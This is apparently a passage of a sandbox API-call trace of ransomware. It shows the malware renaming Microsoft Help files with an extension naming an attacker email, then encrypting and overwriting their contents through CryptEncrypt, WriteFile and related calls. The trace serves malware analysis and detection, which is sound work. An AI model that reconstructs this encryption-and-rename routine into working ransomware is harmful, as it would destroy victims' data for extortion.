	[0100.200] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.202] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.202] GetProcessHeap () returned 0x540000
	[0100.202] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.202] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=338) returned 1
	[0100.202] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x152
	[0100.202] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.202] GetProcessHeap () returned 0x540000
	[0100.202] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.202] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.202] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.203] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.203] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.203] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.203] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.203] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.203] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.203] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.204] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.209] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 61
	[0100.209] GetProcessHeap () returned 0x540000
	[0100.209] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x601bd0
	[0100.209] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn"
	[0100.209] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.209] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.211] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.211] GetProcessHeap () returned 0x540000
	[0100.211] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.211] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=362) returned 1
	[0100.211] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x16a
	[0100.211] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.211] GetProcessHeap () returned 0x540000
	[0100.211] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.212] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.212] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.213] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.213] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.213] ReadFile (in: hFile=0x4c0, lpBuffer=0x56b448, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.213] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.213] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.213] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.213] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.213] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.214] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 57
	[0100.214] GetProcessHeap () returned 0x540000
	[0100.214] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.214] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn"
	[0100.214] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.214] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.216] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.217] GetProcessHeap () returned 0x540000
	[0100.217] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.217] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=338) returned 1
	[0100.217] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x152
	[0100.217] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.217] GetProcessHeap () returned 0x540000
	[0100.217] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.217] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.217] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.218] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.218] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.218] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.218] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.218] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.219] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.219] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.219] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.220] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 59
	[0100.220] GetProcessHeap () returned 0x540000
	[0100.220] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x601bd0
	[0100.220] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn"
	[0100.220] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.220] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.225] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.225] GetProcessHeap () returned 0x540000
	[0100.225] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.225] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=350) returned 1
	[0100.225] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15e
	[0100.225] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.225] GetProcessHeap () returned 0x540000
	[0100.225] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.225] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.225] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.226] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.226] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.226] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.226] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.226] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.226] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.226] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.227] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.227] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 59
	[0100.227] GetProcessHeap () returned 0x540000
	[0100.227] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x601bd0
	[0100.228] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn"
	[0100.228] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.228] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.230] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.230] GetProcessHeap () returned 0x540000
	[0100.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.230] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=350) returned 1
	[0100.230] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15e
	[0100.230] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.230] GetProcessHeap () returned 0x540000
	[0100.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.230] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.231] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.232] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.232] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.232] ReadFile (in: hFile=0x4c0, lpBuffer=0x56b448, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.232] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.232] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.232] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.232] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.232] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.233] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 66
	[0100.233] GetProcessHeap () returned 0x540000
	[0100.233] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x598b60
	[0100.233] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn"
	[0100.233] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.233] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.235] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.235] GetProcessHeap () returned 0x540000
	[0100.235] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.235] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=392) returned 1
	[0100.236] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x188
	[0100.236] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.236] GetProcessHeap () returned 0x540000
